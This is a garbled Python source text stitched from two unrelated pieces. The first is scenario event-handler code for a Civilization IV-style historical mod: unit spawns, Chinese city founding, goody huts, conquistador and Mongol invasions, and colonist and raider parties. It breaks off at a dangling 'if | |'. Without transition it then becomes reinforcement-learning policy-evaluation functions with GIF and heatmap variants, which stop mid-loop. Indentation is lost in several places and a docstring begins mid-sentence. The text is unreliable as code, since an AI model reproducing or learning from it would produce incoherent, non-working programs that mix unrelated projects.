makeUnit(iPhoenicia, iGalley, direction(tCarthage, DirectionTypes.DIRECTION_NORTHWEST), UnitAITypes.UNITAI_SETTLER_SEA)
makeUnit(iPhoenicia, iSettler, direction(tCarthage, DirectionTypes.DIRECTION_NORTHWEST), UnitAITypes.UNITAI_SETTLE)
if player(iRome).isHuman():
city.setHasRealBuilding(iWalls, True)
makeUnits(iPhoenicia, iArcher, tCarthage, 2, UnitAITypes.UNITAI_CITY_DEFENSE)
makeUnits(iPhoenicia, iNumidianCavalry, tCarthage, 3)
makeUnits(iPhoenicia, iWarElephant, tCarthage, 2, UnitAITypes.UNITAI_CITY_COUNTER)
### UNIT BUILT ###
# candidate historical city sites for AI China's settlers
lChineseCities = [tBeijing, tKaifeng, tLuoyang, tShanghai, tHangzhou, tGuangzhou, tHaojing]
@handler("unitBuilt")
def foundChineseCity(city, unit):
	# Chinese AI settlers found a city directly on a random free historical site
	if unit.isFound() and civ(unit) == iChina and not player(unit).isHuman():
		plot = plots.of(lChineseCities).where(lambda plot: isFree(unit.getOwner(), plot, True, True, True)).random()
		if plot:
			plot.setOwner(unit.getOwner())
			player(unit).found(plot.getX(), plot.getY())
		# NOTE(review): the settler is consumed even when no free site was
		# found (kill is outside the `if plot:` branch) -- confirm intended
		unit.kill(False, -1)
### BEGIN GAME TURN ###
@handler("BeginGameTurn")
def placeGoodyHuts(iGameTurn):
	# scatter goody huts three turns into the scenario; each placeHut call
	# takes the (x, y) corners of a map rectangle, named by the comment
	if iGameTurn == scenarioStartTurn() + 3:
		# these regions are already settled in later scenario starts
		if scenario() == i3000BC:
			placeHut((101, 38), (107, 41)) # Southern China
			placeHut((62, 45), (67, 50)) # Balkans
			placeHut((69, 42), (76, 46)) # Asia Minor
		if scenario() <= i600AD:
			placeHut((49, 40), (54, 46)) # Iberia
			placeHut((57, 51), (61, 56)) # Denmark / Northern Germany
			placeHut((48, 55), (49, 58)) # Ireland
			placeHut((50, 53), (54, 60)) # Britain
			placeHut((57, 57), (65, 65)) # Scandinavia
			placeHut((73, 53), (81, 58)) # Russia
			placeHut((81, 43), (86, 47)) # Transoxania
			placeHut((88, 30), (94, 36)) # Deccan
			placeHut((110, 40), (113, 43)) # Shikoku
			placeHut((114, 49), (116, 52)) # Hokkaido
			placeHut((85, 53), (99, 59)) # Siberia
			placeHut((103, 24), (109, 29)) # Indonesia
			placeHut((68, 17), (72, 23)) # East Africa
			placeHut((65, 10), (70, 16)) # South Africa
			placeHut((22, 48), (29, 51)) # Great Lakes
			placeHut((18, 44), (22, 52)) # Great Plains
			placeHut((34, 25), (39, 29)) # Amazonas Delta
			placeHut((33, 9), (37, 15)) # Parana Delta
			placeHut((25, 36), (32, 39)) # Caribbean
			placeHut((107, 19), (116, 22)) # Northern Australia
			placeHut((114, 10), (118, 17)) # Western Australia
			placeHut((120, 5), (123, 11)) # New Zealand
			placeHut((59, 25), (67, 28)) # Central Africa
@handler("BeginGameTurn")
def clearMassilianCulture(iGameTurn):
    """Reset Massilia's culture to 1 just before Spain's birth (600 AD scenario)."""
    if iGameTurn != year(dBirth[iSpain])-1 or scenario() != i600AD:
        return
    pMassilia = city_(56, 46)
    if pMassilia:
        pMassilia.setCulture(pMassilia.getOwner(), 1, True)
@handler("BeginGameTurn")
def ottomansFlipIndependents(iGameTurn):
    """One turn after the Ottoman spawn, flip minor cities in their birth area.

    Fix: ``convertSurroundingPlotCulture`` is a module-level helper (it is
    called bare in flipChineseStartingCities); the previous ``self.`` prefix
    would raise NameError inside this module-level function.
    """
    if iGameTurn == data.iOttomanSpawnTurn + 1:
        for city in cities.birth(iOttomans):
            iOwner = city.getOwner()
            if is_minor(iOwner):
                # TODO: this should be better but is not covered by completeCityFlip
                flipCity(city, False, True, slot(iOttomans), ())
                cultureManager(city, 100, slot(iOttomans), iOwner, True, False, False)
                convertSurroundingPlotCulture(slot(iOttomans), plots.surrounding(city))
                makeUnit(iOttomans, iCrossbowman, city)
@handler("BeginGameTurn")
def createCarthaginianSettler(iGameTurn):
    """Around 820 BC (jittered by the game seed), reinforce AI Phoenicia at Carthage."""
    if player(iPhoenicia).isHuman():
        return
    if iGameTurn == year(-820) - (data.iSeed % 10):
        makeUnit(iPhoenicia, iSettler, tCarthage)
        # paired escorts and support for the settler party
        for iUnitType in (iArcher, iWorker, iWarElephant):
            makeUnits(iPhoenicia, iUnitType, tCarthage, 2)
# TODO: revisit how this works
@handler("BeginGameTurn")
def checkEarlyColonists():
    """Grant a seaborne colonist party to selected ancient civs in fixed years."""
    dEarlyColonistYears = {
        -850: iGreece,
        -700: iCarthage,
        -600: iRome,
        -400: iRome,
    }
    iRecipient = dEarlyColonistYears.get(game.getGameTurnYear())
    if iRecipient is not None:
        giveEarlyColonists(iRecipient)
@handler("BeginGameTurn")
def checkLateColonists():
    """Periodically hand colonist parties to living trading-company civs (1350-1918)."""
    if not year().between(1350, 1918):
        return
    for iCiv in dTradingCompanyPlots:
        if not player(iCiv).isAlive():
            continue
        iPlayer = slot(iCiv)
        # first party one turn after Exploration, then one every 8 turns
        iDueTurn = data.players[iPlayer].iExplorationTurn + 1 + data.players[iPlayer].iColonistsAlreadyGiven * 8
        if turn() == iDueTurn:
            giveColonists(iPlayer)
@handler("BeginGameTurn")
def checkRaiders():
    """During the raiding era (860-1250), spawn Viking raiders every ten turns."""
    bRaidingEra = year().between(860, 1250)
    if bRaidingEra and turn() % turns(10) == 9:
        giveRaiders(iVikings)
@handler("BeginGameTurn")
def moorishSpawnInMorocoo():
    """Seed Marrakesh with Islam plus a settler and worker just before 710 AD."""
    # NOTE(review): compares year() with year(710)-1, while sibling handlers
    # compare turn values (turn(), scenarioStartTurn()) — confirm year() and
    # year(710) are in the same unit here.
    if year() == year(710)-1:
        marrakesh = city_(51, 37)
        if marrakesh:
            marrakesh.setHasReligion(iIslam, True, False, False)
            makeUnit(marrakesh.getOwner(), iSettler, marrakesh)
            makeUnit(marrakesh.getOwner(), iWorker, marrakesh)
@handler("BeginGameTurn")
def flipChineseStartingCities():
    """At the 600 AD scenario start, flip cities and culture in China's birth area."""
    # NOTE(review): `year() == scenarioStartTurn()` compares what elsewhere look
    # like a year value and a turn value — confirm the units agree.
    if scenario() == i600AD and year() == scenarioStartTurn():
        tTL, tBR = dBirthArea[iChina]
        if not player(iChina).isHuman():
            tTL = (99, 39) # 4 tiles further north
        china = plots.start(tTL).end(tBR)
        iNumAICitiesConverted, iNumHumanCitiesToConvert = convertSurroundingCities(slot(iChina), china)
        convertSurroundingPlotCulture(slot(iChina), china)
        # absorb independent and barbarian units inside the flip zone
        for iMinor in players.independent().barbarian():
            flipUnitsInArea(china, slot(iChina), iMinor, False, player(iMinor).isBarbarian())
### FIRST CONTACT ###
@handler("firstContact")
def conquistadors(iTeamX, iHasMetTeamY):
    """Spawn an Old World invasion on first contact with a New World civ.

    Fires once per New World civ (tracked in data.dFirstContactConquerors)
    between 600 and 1800 AD. The invader lands an army scaled by the
    defender's size and era on a plot near where contact became visible.
    """
    if is_minor(iTeamX) or is_minor(iHasMetTeamY):
        return
    if year().between(600, 1800):
        if civ(iTeamX) in lBioNewWorld and civ(iHasMetTeamY) not in lBioNewWorld:
            iNewWorldPlayer = iTeamX
            iOldWorldPlayer = iHasMetTeamY
            iNewWorldCiv = civ(iNewWorldPlayer)
            bAlreadyContacted = data.dFirstContactConquerors[iNewWorldCiv]
            # avoid "return later" exploit
            if year() <= year(dBirth[iAztecs]) + turns(10):
                data.dFirstContactConquerors[iNewWorldCiv] = True
                return
            if not bAlreadyContacted:
                # contact zone rectangle per New World civ
                # NOTE(review): assumes lBioNewWorld is exactly {Maya, Aztecs,
                # Inca}; any other member would leave tContactZoneTL unbound.
                if iNewWorldCiv == iMaya:
                    tContactZoneTL = (15, 30)
                    tContactZoneBR = (34, 42)
                elif iNewWorldCiv == iAztecs:
                    tContactZoneTL = (11, 31)
                    tContactZoneBR = (34, 43)
                elif iNewWorldCiv == iInca:
                    tContactZoneTL = (21, 11)
                    tContactZoneBR = (36, 40)
                lArrivalExceptions = [(25, 32), (26, 40), (25, 42), (23, 42), (21, 42)]
                data.dFirstContactConquerors[iNewWorldCiv] = True
                # change some terrain to end isolation
                if iNewWorldCiv == iInca:
                    plot(27, 30).setFeatureType(-1, 0)
                    plot(28, 31).setFeatureType(-1, 0)
                    plot(29, 23).setPlotType(PlotTypes.PLOT_HILLS, True, True)
                    plot(31, 13).setPlotType(PlotTypes.PLOT_HILLS, True, True)
                    plot(32, 19).setPlotType(PlotTypes.PLOT_HILLS, True, True)
                    plot(27, 29).setPlotType(PlotTypes.PLOT_HILLS, True, True) #Bogota
                elif iNewWorldCiv == iAztecs:
                    plot(40, 66).setPlotType(PlotTypes.PLOT_HILLS, True, True)
                newWorldPlots = plots.start(tContactZoneTL).end(tContactZoneBR).without(lArrivalExceptions)
                # plots both sides can see: where contact plausibly happened
                contactPlots = newWorldPlots.where(lambda p: p.isVisible(iNewWorldPlayer, False) and p.isVisible(iOldWorldPlayer, False))
                # landing sites: native-owned, not a city, enterable, on a landmass with native cities
                arrivalPlots = newWorldPlots.owner(iNewWorldPlayer).where(lambda p: not p.isCity() and isFree(iOldWorldPlayer, p, bCanEnter=True) and map.getArea(p.getArea()).getCitiesPerPlayer(iNewWorldPlayer) > 0)
                if contactPlots and arrivalPlots:
                    contactPlot = contactPlots.random()
                    arrivalPlot = arrivalPlots.closest(contactPlot)
                    # invasion size modifiers: bigger defender empires and
                    # pre-player-birth contact mean larger armies
                    iModifier1 = 0
                    iModifier2 = 0
                    if player(iNewWorldPlayer).isHuman() and player(iNewWorldPlayer).getNumCities() > 6:
                        iModifier1 = 1
                    else:
                        if iNewWorldCiv == iInca or player(iNewWorldPlayer).getNumCities() > 4:
                            iModifier1 = 1
                        if not player(iNewWorldPlayer).isHuman():
                            iModifier2 = 1
                    if year() < year(dBirth[active()]):
                        iModifier1 += 1
                        iModifier2 += 1
                    team(iOldWorldPlayer).declareWar(iNewWorldPlayer, True, WarPlanTypes.WARPLAN_TOTAL)
                    iInfantry = getBestInfantry(iOldWorldPlayer)
                    iCounter = getBestCounter(iOldWorldPlayer)
                    iCavalry = getBestCavalry(iOldWorldPlayer)
                    iSiege = getBestSiege(iOldWorldPlayer)
                    iStateReligion = player(iOldWorldPlayer).getStateReligion()
                    iMissionary = missionary(iStateReligion)
                    if iInfantry:
                        makeUnits(iOldWorldPlayer, iInfantry, arrivalPlot, 1 + iModifier2, UnitAITypes.UNITAI_ATTACK_CITY)
                    if iCounter:
                        makeUnits(iOldWorldPlayer, iCounter, arrivalPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
                    if iSiege:
                        makeUnits(iOldWorldPlayer, iSiege, arrivalPlot, 1 + iModifier1 + iModifier2, UnitAITypes.UNITAI_ATTACK_CITY)
                    if iCavalry:
                        makeUnits(iOldWorldPlayer, iCavalry, arrivalPlot, 2 + iModifier1, UnitAITypes.UNITAI_ATTACK_CITY)
                    if iMissionary:
                        makeUnit(iOldWorldPlayer, iMissionary, arrivalPlot)
                    # native auxiliaries join the invader
                    if iNewWorldCiv == iInca:
                        makeUnits(iOldWorldPlayer, iAucac, arrivalPlot, 3, UnitAITypes.UNITAI_ATTACK_CITY)
                    elif iNewWorldCiv == iAztecs:
                        makeUnits(iOldWorldPlayer, iJaguar, arrivalPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
                        makeUnit(iOldWorldPlayer, iHolkan, arrivalPlot, UnitAITypes.UNITAI_ATTACK_CITY)
                    elif iNewWorldCiv == iMaya:
                        makeUnits(iOldWorldPlayer, iHolkan, arrivalPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
                        makeUnit(iOldWorldPlayer, iJaguar, arrivalPlot, UnitAITypes.UNITAI_ATTACK_CITY)
                    message(iNewWorldPlayer, 'TXT_KEY_FIRST_CONTACT_NEWWORLD')
                    message(iOldWorldPlayer, 'TXT_KEY_FIRST_CONTACT_OLDWORLD')
@handler("firstContact")
def mongolConquerors(iTeamX, iHasMetTeamY):
    """Spawn a Mongol horde on first contact with scripted target civs.

    Fires once per target civ before 1500 AD (tracked via
    data.isFirstContactMongols) when the AI Mongols meet a civ in lMongolCivs.
    """
    if civ(iHasMetTeamY) == iMongols and not player(iMongols).isHuman():
        iCivX = civ(iTeamX)
        if iCivX in lMongolCivs:
            if year() < year(1500) and data.isFirstContactMongols(iCivX):
                data.setFirstContactMongols(iCivX, False)
                teamTarget = team(iTeamX)  # NOTE(review): appears unused below
                # horde staging rectangle and approach direction per target
                # NOTE(review): if lMongolCivs has members beyond these four,
                # tTL/tBR/iDirection would be unbound for them — confirm.
                if iCivX == iArabia:
                    tTL = (73, 31)
                    tBR = (84, 43)
                    iDirection = DirectionTypes.DIRECTION_EAST
                elif iCivX == iPersia:
                    tTL = (73, 37)
                    tBR = (86, 48)
                    iDirection = DirectionTypes.DIRECTION_NORTH
                elif iCivX == iByzantium:
                    tTL = (68, 41)
                    tBR = (77, 46)
                    iDirection = DirectionTypes.DIRECTION_EAST
                elif iCivX == iRussia:
                    tTL = (68, 48)
                    tBR = (81, 62)
                    iDirection = DirectionTypes.DIRECTION_EAST
                lTargetList = getBorderPlots(iTeamX, tTL, tBR, iDirection, 3)
                if not lTargetList: return
                team(iMongols).declareWar(iTeamX, True, WarPlanTypes.WARPLAN_TOTAL)
                # human targets face a larger horde scaled by difficulty
                iHandicap = 0
                if teamtype(iTeamX).isHuman():
                    iHandicap = game.getHandicapType() / 2
                for tPlot in lTargetList:
                    makeUnits(iMongols, iKeshik, tPlot, 2 + iHandicap, UnitAITypes.UNITAI_ATTACK_CITY)
                    makeUnits(iMongols, iMangudai, tPlot, 1 + 2 * iHandicap, UnitAITypes.UNITAI_ATTACK_CITY)
                    makeUnits(iMongols, iTrebuchet, tPlot, 1 + iHandicap, UnitAITypes.UNITAI_ATTACK_CITY)
                message(iTeamX, 'TXT_KEY_MONGOL_HORDE_HUMAN')
                if team().canContact(iTeamX):
                    message(active(), 'TXT_KEY_MONGOL_HORDE', adjective(iTeamX))
### TECH ACQUIRED ###
@handler("techAcquired")
def recordExplorationTurn(iTech, iTeam, iPlayer):
    # Remember when each player researched Exploration; the colonist schedule
    # in checkLateColonists counts turns from this point.
    if iTech == iExploration:
        data.players[iPlayer].iExplorationTurn = game.getGameTurn()
@handler("techAcquired")
def openIcelandRoute(iTech):
    # Once anyone knows Compass, turn (49, 62) into coast to open the
    # northern sea route past Iceland.
    # NOTE(review): sibling techAcquired handlers take (iTech, iTeam, iPlayer);
    # confirm the event dispatcher tolerates this one-argument signature.
    if iTech == iCompass:
        plot(49, 62).setTerrainType(iCoast, True, True)
@handler("techAcquired")
def americanWestCoastSettlement(iTech, iTeam, iPlayer):
    """On Railroad, have AI America conquer or settle the West Coast strip."""
    if iTech == iRailroad and civ(iPlayer) == iAmerica and not player(iPlayer).isHuman():
        lWestCoast = [(11, 50), (11, 49), (11, 48), (11, 47), (11, 46), (12, 45)]
        enemyCities = cities.of(lWestCoast).notowner(iAmerica)
        for iEnemy in enemyCities.owners():
            team(iPlayer).declareWar(iEnemy, True, WarPlanTypes.WARPLAN_LIMITED)
        for city in enemyCities:
            # NOTE(review): .random() may return None if no surrounding plot
            # qualifies; makeUnits would then receive a None plot — confirm.
            plot = plots.surrounding(city).without(city).land().passable().no_enemies(iPlayer).random()
            makeUnits(iPlayer, iMinuteman, plot, 3, UnitAITypes.UNITAI_ATTACK_CITY)
            makeUnits(iPlayer, iCannon, plot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
        # settle any remaining free coast spots, up to two settler parties total
        if enemyCities.count() < 2:
            for plot in plots.of(lWestCoast).without(enemyCities).sample(2 - enemyCities.count()):
                makeUnit(iPlayer, iSettler, plot)
                makeUnit(iPlayer, iMinuteman, plot)
@handler("techAcquired")
def russianSiberianSettlement(iTech, iTeam, iPlayer):
    """On Railroad, push AI Russia to take or found Vladivostok."""
    if iTech == iRailroad and civ(iPlayer) == iRussia and not player(iPlayer).isHuman():
        tVladivostok = (111, 51)
        vladivostok = city(tVladivostok)
        convertPlotCulture(plot_(tVladivostok), iPlayer, 100, True)
        if vladivostok and vladivostok.getOwner() != iPlayer:
            # attack the foreign city from an adjacent city-free land plot
            # NOTE(review): .random() may return None if no plot qualifies;
            # makeUnits would then receive a None plot — confirm.
            spawnPlot = plots.surrounding(tVladivostok).land().passable().where(lambda plot: not city_(plot)).random()
            team(iTeam).declareWar(vladivostok.getTeam(), True, WarPlanTypes.WARPLAN_LIMITED)
            makeUnits(iPlayer, iRifleman, spawnPlot, 4, UnitAITypes.UNITAI_ATTACK_CITY)
            makeUnits(iPlayer, iCannon, spawnPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
        elif isFree(iPlayer, tVladivostok, True):
            # site is open: found the city directly and claim nearby culture
            player(iPlayer).found(*tVladivostok)
            makeUnits(iPlayer, iRifleman, tVladivostok, 2)
            for plot in plots.surrounding(tVladivostok):
                convertPlotCulture(plot, iPlayer, 80, True)
@handler("techAcquired")
def earlyTradingCompany(iTech, iTeam, iPlayer):
    """Start colonial acquisition for AI Spain/Portugal once both key techs are in."""
    if turn() == scenarioStartTurn():
        return
    if civ(iPlayer) not in [iSpain, iPortugal]:
        return
    lTechs = [iExploration, iFirearms]
    if iTech not in lTechs:
        return
    # fire only when the just-acquired tech completes the pair
    if not all(team(iTeam).isHasTech(iRequired) for iRequired in lTechs):
        return
    if not player(iPlayer).isHuman() and not team(iTeam).isAVassal():
        handleColonialAcquisition(iPlayer)
@handler("techAcquired")
def lateTradingCompany(iTech, iTeam, iPlayer):
    """Start colonial conquest for AI France/England/Netherlands once both key techs are in."""
    if turn() == scenarioStartTurn():
        return
    if civ(iPlayer) not in [iFrance, iEngland, iNetherlands]:
        return
    lTechs = [iEconomics, iReplaceableParts]
    if iTech not in lTechs:
        return
    # fire only when the just-acquired tech completes the pair
    if not all(team(iTeam).isHasTech(iRequired) for iRequired in lTechs):
        return
    if not player(iPlayer).isHuman() and not team(iTeam).isAVassal():
        handleColonialConquest(iPlayer)
### COLLAPSE ###
@handler("collapse")
def removeOrthodoxyFromAnatolia(iPlayer):
    # When Byzantium collapses, purge Orthodoxy from the Anatolian region.
    if civ(iPlayer) == iByzantium:
        removeReligionByArea(plots.region(rAnatolia), iOrthodoxy)
### BIRTH ###
@handler("birth")
def clearDanishCulture(iPlayer):
    """On Holy Rome's birth, flip city-less Viking-owned plots to Holy Roman culture."""
    if civ(iPlayer) == iHolyRome and player(iVikings).isAlive():
        # only plots on landmasses where the owner has no cities
        for plot in plots.owner(iVikings).land().where(lambda p: map.getArea(p.getArea()).getCitiesPerPlayer(p.getOwner()) == 0):
            plot.setCultureConversion(slot(iHolyRome), 100)
### IMPLEMENTATION ###
def relocateCapitals(iPlayer, city):
    """Move an AI player's capital when scripted relocation conditions apply.

    Called on city acquisition and founding. Two cases: (1) the player has a
    scripted capital site in dRelocatedCapitals and just obtained that city;
    (2) the Turks control the Persian core but their capital is outside it.
    """
    if player(iPlayer).isHuman():
        return
    if iPlayer in dRelocatedCapitals:
        tCapital = dRelocatedCapitals[iPlayer]
        # only act when the city just obtained is the scripted site
        if location(city) == tCapital:
            relocateCapital(iPlayer, tCapital)
    # Turks move their capital into the Persian core once they control it
    if civ(iPlayer) == iTurks and isControlled(iPlayer, plots.core(iPersia)):
        capital = player(iPlayer).getCapitalCity()
        if capital not in plots.core(iPersia):
            newCapital = cities.core(iPersia).owner(iPlayer).random()
            if newCapital:
                relocateCapital(iPlayer, location(newCapital))
def buildCapitalInfrastructure(iPlayer, city):
    """Stock a scripted civ's capital with its starting population and buildings.

    Applies only within five turns of the civ's spawn and only when the city
    is the capital plot listed for iPlayer in dCapitalInfrastructure.
    """
    if iPlayer not in dCapitalInfrastructure:
        return
    if not at(city, plots.capital(iPlayer)):
        return
    if year() > year(dSpawn[iPlayer]) + turns(5):
        return
    iPopulation, lBuildings, lReligiousBuildings = dCapitalInfrastructure[iPlayer]
    # never shrink a capital that already grew past the scripted size
    if city.getPopulation() < iPopulation:
        city.setPopulation(iPopulation)
    for iBuilding in lBuildings:
        city.setHasRealBuilding(iBuilding, True)
    # religious buildings depend on the owner's state religion
    iStateReligion = player(iPlayer).getStateReligion()
    if iStateReligion >= 0:
        for religiousBuilding in lReligiousBuildings:
            city.setHasRealBuilding(religiousBuilding(iStateReligion), True)
def giveEarlyColonists(iCiv):
    """Spawn a seaborne colonist party (galley, settler, archer) next to a city of iCiv."""
    pPlayer = player(iCiv)
    if not pPlayer.isAlive() or pPlayer.isHuman():
        return
    capital = pPlayer.getCapitalCity()
    # Rome colonizes from its Iberian holdings rather than from the capital
    if iCiv == iRome:
        capital = cities.owner(iCiv).region(rIberia).random()
    if not capital:
        return
    tSeaPlot = findSeaPlots(capital, 1, iCiv)
    if tSeaPlot:
        makeUnit(iCiv, iGalley, tSeaPlot, UnitAITypes.UNITAI_SETTLER_SEA)
        makeUnit(iCiv, iSettler, tSeaPlot)
        makeUnit(iCiv, iArcher, tSeaPlot)
def giveColonists(iPlayer):
    """Give an eligible AI colonial power a seaborne settler party.

    Requires Exploration and stops once the civ's quota in dMaxColonists is
    exhausted. English parties prefer embarking from existing Canadian or
    Australian colonies so those regions keep growing.
    """
    pPlayer = player(iPlayer)
    pTeam = team(iPlayer)
    iCiv = civ(iPlayer)
    if pPlayer.isAlive() and not pPlayer.isHuman() and iCiv in dMaxColonists:
        if pTeam.isHasTech(iExploration) and data.players[iPlayer].iColonistsAlreadyGiven < dMaxColonists[iCiv]:
            sourceCities = cities.core(iCiv).owner(iPlayer)
            # help England with settling Canada and Australia
            if iCiv == iEngland:
                colonialCities = cities.start(tCanadaTL).end(tCanadaBR).owner(iPlayer)
                colonialCities += cities.start(tAustraliaTL).end(tAustraliaBR).owner(iPlayer)
                if colonialCities:
                    sourceCities = colonialCities
            city = sourceCities.coastal().random()
            if city:
                tSeaPlot = findSeaPlots(city, 1, iCiv)
                # no free sea plot: spawn the party in the city itself
                if not tSeaPlot: tSeaPlot = city
                makeUnit(iPlayer, unique_unit(iPlayer, iGalleon), tSeaPlot, UnitAITypes.UNITAI_SETTLER_SEA)
                makeUnit(iPlayer, iSettler, tSeaPlot, UnitAITypes.UNITAI_SETTLE)
                makeUnit(iPlayer, getBestDefender(iPlayer), tSeaPlot)
                makeUnit(iPlayer, iWorker, tSeaPlot)
                data.players[iPlayer].iColonistsAlreadyGiven += 1
def giveRaiders(iCiv):
    """Spawn a raiding party (ship plus two melee units) off a coastal city of an AI civ."""
    pPlayer = player(iCiv)
    pTeam = team(iCiv)
    if not pPlayer.isAlive() or pPlayer.isHuman():
        return
    city = cities.owner(iCiv).coastal().random()
    if not city:
        return
    seaPlot = findSeaPlots(location(city), 1, iCiv)
    if not seaPlot:
        return
    makeUnit(iCiv, unique_unit(iCiv, iGalley), seaPlot, UnitAITypes.UNITAI_ASSAULT_SEA)
    # heavy swordsmen once Steel is known, plain swordsmen before that
    if pTeam.isHasTech(iSteel):
        iRaider = iHeavySwordsman
    else:
        iRaider = iSwordsman
    makeUnit(iCiv, unique_unit(iCiv, iRaider), seaPlot, UnitAITypes.UNITAI_ATTACK)
    makeUnit(iCiv, unique_unit(iCiv, iRaider), seaPlot, UnitAITypes.UNITAI_ATTACK_CITY)
def handleColonialAcquisition(iPlayer):
pPlayer = player(iPlayer)
iCiv = civ(iPlayer)
targets = getColonialTargets(iPlayer, bEmpty=True)
if | |
to evaluate.
:param env: The gym environment or ``VecEnv`` environment.
:param n_eval_episodes: Number of episode to evaluate the agent
:param deterministic: Whether to use deterministic or stochastic actions
:param render: Whether to render the environment or not
:param callback: callback function to do additional checks,
called after each step. Gets locals() and globals() passed as parameters.
:param reward_threshold: Minimum expected reward per episode,
this will raise an error if the performance is not met
:param return_episode_rewards: If True, a list of rewards and episode lengths
per episode will be returned instead of the mean.
:param warn: If True (default), warns user about lack of a Monitor wrapper in the
evaluation environment.
:return: Mean reward per episode, std of reward per episode.
Returns ([float], [int]) when ``return_episode_rewards`` is True, first
list containing per-episode rewards and second containing per-episode lengths
(in number of steps).
"""
is_monitor_wrapped = False
# Avoid circular import
from stable_baselines3.common.monitor import Monitor
if not isinstance(env, VecEnv):
env = DummyVecEnv([lambda: env])
is_monitor_wrapped = is_vecenv_wrapped(env, VecMonitor) or env.env_is_wrapped(Monitor)[0]
if not is_monitor_wrapped and warn:
warnings.warn(
"Evaluation environment is not wrapped with a ``Monitor`` wrapper. "
"This may result in reporting modified episode lengths and rewards, if other wrappers happen to modify these. "
"Consider wrapping environment first with ``Monitor`` wrapper.",
UserWarning,
)
n_envs = env.num_envs
episode_rewards = []
episode_lengths = []
episode_counts = np.zeros(n_envs, dtype="int")
# Divides episodes among different sub environments in the vector as evenly as possible
episode_count_targets = np.array([(n_eval_episodes + i) // n_envs for i in range(n_envs)], dtype="int")
current_rewards = np.zeros(n_envs)
current_lengths = np.zeros(n_envs, dtype="int")
observations = env.reset()
states = None
frames = [[] for _ in range(n_eval_episodes)]
current_episode = 0
while (episode_counts < episode_count_targets).any():
env.render('human')
actions, states = model.predict(observations, state=states, deterministic=deterministic)
observations, rewards, dones, infos = env.step(actions)
current_rewards += rewards
current_lengths += 1
for i in range(n_envs):
frames[current_episode].append(np.moveaxis(env.render("rgb_array"), 2, 0))
if episode_counts[i] < episode_count_targets[i]:
# unpack values so that the callback can access the local variables
reward = rewards[i]
done = dones[i]
info = infos[i]
if callback is not None:
callback(locals(), globals())
if dones[i]:
if is_monitor_wrapped:
# Atari wrapper can send a "done" signal when
# the agent loses a life, but it does not correspond
# to the true end of episode
if "episode" in info.keys():
# Do not trust "done" with episode endings.
# Monitor wrapper includes "episode" key in info if environment
# has been wrapped with it. Use those rewards instead.
episode_rewards.append(info["episode"]["r"])
episode_lengths.append(info["episode"]["l"])
# Only increment at the real end of an episode
episode_counts[i] += 1
else:
episode_rewards.append(current_rewards[i])
episode_lengths.append(current_lengths[i])
episode_counts[i] += 1
current_episode += 1
current_rewards[i] = 0
current_lengths[i] = 0
if states is not None:
states[i] *= 0
if render:
env.render()
print("Saving gifs... ")
gif_path = os.path.join(path, "gif")
os.makedirs(gif_path)
for i in range(n_eval_episodes):
write_gif(np.array(frames[i]),
os.path.join(gif_path, "{}.gif".format(i)),
1/0.1)
print("Done.")
mean_reward = np.mean(episode_rewards)
std_reward = np.std(episode_rewards)
if reward_threshold is not None:
assert mean_reward > reward_threshold, "Mean reward below threshold: " f"{mean_reward:.2f} < {reward_threshold:.2f}"
if return_episode_rewards:
return episode_rewards, episode_lengths
return mean_reward, std_reward
def evaluate_policy_heatmap(
    model: "base_class.BaseAlgorithm",
    env: Union[gym.Env, VecEnv],
    n_eval_episodes: int = 10,
    deterministic: bool = True,
    render: bool = False,
    callback: Optional[Callable[[Dict[str, Any], Dict[str, Any]], None]] = None,
    reward_threshold: Optional[float] = None,
    return_episode_rewards: bool = False,
    warn: bool = True,
    path: str = '',
    gif: bool = False,
    heatmap: bool = False
) -> Union[Tuple[float, float], Tuple[List[float], List[int]]]:
    """
    Runs policy for ``n_eval_episodes`` episodes and returns average reward.
    If a vector env is passed in, this divides the episodes to evaluate onto the
    different elements of the vector env. This static division of work is done to
    remove bias. See https://github.com/DLR-RM/stable-baselines3/issues/402 for more
    details and discussion.
    .. note::
        If environment has not been wrapped with ``Monitor`` wrapper, reward and
        episode lengths are counted as it appears with ``env.step`` calls. If
        the environment contains wrappers that modify rewards or episode lengths
        (e.g. reward scaling, early episode reset), these will affect the evaluation
        results as well. You can avoid this by wrapping environment with ``Monitor``
        wrapper before anything else.
    :param model: The RL agent you want to evaluate.
    :param env: The gym environment or ``VecEnv`` environment.
    :param n_eval_episodes: Number of episode to evaluate the agent
    :param deterministic: Whether to use deterministic or stochastic actions
    :param render: Whether to render the environment or not
    :param callback: callback function to do additional checks,
        called after each step. Gets locals() and globals() passed as parameters.
    :param reward_threshold: Minimum expected reward per episode,
        this will raise an error if the performance is not met
    :param return_episode_rewards: If True, a list of rewards and episode lengths
        per episode will be returned instead of the mean.
    :param warn: If True (default), warns user about lack of a Monitor wrapper in the
        evaluation environment.
    :param path: Directory under which a ``heatmap`` folder is created for the plots.
    :param gif: Unused by this variant — TODO confirm before removal.
    :param heatmap: Unused by this variant — TODO confirm before removal.
    :return: Mean reward per episode, std of reward per episode.
        Returns ([float], [int]) when ``return_episode_rewards`` is True, first
        list containing per-episode rewards and second containing per-episode lengths
        (in number of steps).
    """
    is_monitor_wrapped = False
    # Avoid circular import
    from stable_baselines3.common.monitor import Monitor
    if not isinstance(env, VecEnv):
        env = DummyVecEnv([lambda: env])
    is_monitor_wrapped = is_vecenv_wrapped(env, VecMonitor) or env.env_is_wrapped(Monitor)[0]
    if not is_monitor_wrapped and warn:
        warnings.warn(
            "Evaluation environment is not wrapped with a ``Monitor`` wrapper. "
            "This may result in reporting modified episode lengths and rewards, if other wrappers happen to modify these. "
            "Consider wrapping environment first with ``Monitor`` wrapper.",
            UserWarning,
        )
    n_envs = env.num_envs
    episode_rewards = []
    episode_lengths = []
    episode_counts = np.zeros(n_envs, dtype="int")
    # Divides episodes among different sub environments in the vector as evenly as possible
    episode_count_targets = np.array([(n_eval_episodes + i) // n_envs for i in range(n_envs)], dtype="int")
    current_rewards = np.zeros(n_envs)
    current_lengths = np.zeros(n_envs, dtype="int")
    observations = env.reset()
    states = None
    # Per-episode visit-count grids, sized from the first sub-env's dimensions.
    grid = np.zeros((n_eval_episodes, env.get_attr("height")[0],
                     env.get_attr("width")[0]), dtype=np.float64)
    total_steps = [0 for _ in range(n_eval_episodes)]
    current_episode = 0
    while (episode_counts < episode_count_targets).any():
